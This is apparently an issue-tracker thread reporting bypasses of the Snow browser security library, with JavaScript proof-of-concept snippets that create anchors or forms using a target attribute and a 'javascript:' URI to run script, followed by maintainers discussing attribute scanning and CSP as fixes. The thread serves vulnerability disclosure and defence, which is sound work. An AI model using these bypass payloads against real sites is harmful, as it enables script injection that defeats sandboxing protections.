more javascript uri bypasses with target attr

[arxenix]

f = document.createElement('div');
f.innerHTML = `
<a id="pwn" target="lolpwnd" href="javascript:alert(document.domain)">
`;
document.body.appendChild(f);

document.querySelector("#pwn").click();

f = document.createElement('div');
f.innerHTML = `
<form id="pwn" method="GET" target="lolpwnd" action="javascript:alert(document.domain)">
`;
document.body.appendChild(f);

document.querySelector("#pwn").submit();

[weizman]

fml

[weizman]

also

f = document.createElement('form');
f.id = 'pwn';
f.method = 'GET';
f.target = 'xxx';
f.action = 'javascript:alert(1)';
document.body.appendChild(f);
document.querySelector("#pwn").submit();

(making sure it is clear this isn't just in html scope)

[weizman]

the solution to this will probably be around an important initiative Snow is about to go through where we'd have to recommend some basic level of CSP to be integrated with Snow for Snow to be as secure as possible.
It will for sure address specifically the javascript: catastrophe...

[serapath]

Hm, in both cases (form and anchor tag) it uses javascript:, so maybe all properties have to be scanned, just like you suggested for data uris, so scripts can be prefixed with SNOW?

[weizman]

Definitely! 3-4 months ago, that would be exactly what I would have done.

But in those 3-4 months I was introduced to so many vulns in Snow involving non-sufficient HTML sanitization (mostly by @arxenix and @mmndaniel), that I got convinced that Snow cannot achieve its goal without the help of CSP (which btw circles back to your thread on twitter).

So atm, we're investigating what is the perfect balance of SNOW&CSP between "CSP too strict to use" and "CSP isn't strict enough to actually help Snow".

You're welcome to jump in on this at #109!

But the bottom line is that if we can find a good CSP balance that users will feel ok with adopting to use Snow security, it'll allow us to drop support for HTML based Snow vulns, as I'm losing hope for defending against those correctly..